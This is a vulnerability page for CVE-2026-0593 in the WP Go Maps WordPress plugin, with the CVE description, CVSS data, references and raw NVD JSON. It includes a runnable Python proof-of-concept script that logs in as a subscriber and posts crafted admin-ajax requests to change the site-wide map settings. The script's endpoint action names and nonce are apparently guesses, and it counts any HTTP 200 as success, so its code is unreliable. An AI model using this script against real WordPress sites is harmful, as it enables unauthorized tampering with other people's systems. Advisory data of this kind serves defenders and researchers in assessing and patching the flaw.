CVE-2026-0593

Description

The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the processBackgroundAction() function in all versions up to, and including, 10.0.04. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global map engine settings.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Go Maps (formerly WP Google Maps) < 10.0.05

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-0593 PoC - WP Go Maps Unauthorized Configuration Modification
Author: Security Researcher
Description: This PoC demonstrates the missing capability check vulnerability
              in WP Go Maps plugin's processBackgroundAction() function.
"""

import requests
import sys
from urllib.parse import urljoin

def exploit_wp_go_maps(target_url, username, password):
    """
    Exploit the missing authorization vulnerability in WP Go Maps.
    
    Args:
        target_url: Base URL of the WordPress site
        username: WordPress subscriber-level account username
        password: Password for the account
    """
    
    # Step 1: Login to WordPress
    login_url = urljoin(target_url, 'wp-login.php')
    session = requests.Session()
    
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url,
        'testcookie': '1'
    }
    
    print(f'[*] Logging in as {username}...')
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print('[-] Login failed!')
        return False
    
    print('[+] Login successful!')
    
    # Step 2: Identify the vulnerable endpoint
    # WP Go Maps typically uses admin-ajax.php for AJAX operations
    ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php')
    
    # Step 3: Send malicious request to modify map engine settings
    # The processBackgroundAction function handles various actions
    # We need to identify the specific action for map engine modification
    exploit_data = {
        'action': 'wpgm_process_background_action',
        'background_action': 'modify_global_settings',
        'map_engine': 'leaflet',  # or any other engine to override
        'nonce': 'exploit'  # Some versions may not require valid nonce
    }
    
    print(f'[*] Sending exploit request to {ajax_url}...')
    response = session.post(ajax_url, data=exploit_data)
    
    # Step 4: Verify the modification
    settings_url = urljoin(target_url, 'wp-admin/admin.php?page=wp-go-maps-settings')
    verify_response = session.get(settings_url)
    
    if 'leaflet' in verify_response.text or response.status_code == 200:
        print('[+] Exploit successful! Map engine settings may have been modified.')
        return True
    else:
        print('[-] Exploit may have failed or settings already modified.')
        return False

def main():
    if len(sys.argv) != 4:
        print(f'Usage: {sys.argv[0]} <target_url> <username> <password>')
        print(f'Example: {sys.argv[0]} http://example.com/ subscriber password123')
        sys.exit(1)
    
    target_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    exploit_wp_go_maps(target_url, username, password)

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0593
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0593
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0593/
[4] VulDB https://vuldb.com/cve/CVE-2026-0593
[5] https://plugins.trac.wordpress.org/changeset/3439283/wp-google-maps/trunk/includes/class.admin-notices.php
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/7f0741c1-a5d7-41a4-a739-2cb7cb836509?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0593", "sourceIdentifier": "[email protected]", "published": "2026-01-24T17:15:58.997", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the processBackgroundAction() function in all versions up to, and including, 10.0.04. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global map engine settings."}, {"lang": "es", "value": "El plugin WP Go Maps (anteriormente WP Google Maps) para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función processBackgroundAction() en todas las versiones hasta la 10.0.04, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, modifiquen la configuración global del motor de mapas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3439283/wp-google-maps/trunk/includes/class.admin-notices.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f0741c1-a5d7-41a4-a739-2cb7cb836509?source=cve", "source": "[email protected]"}]}}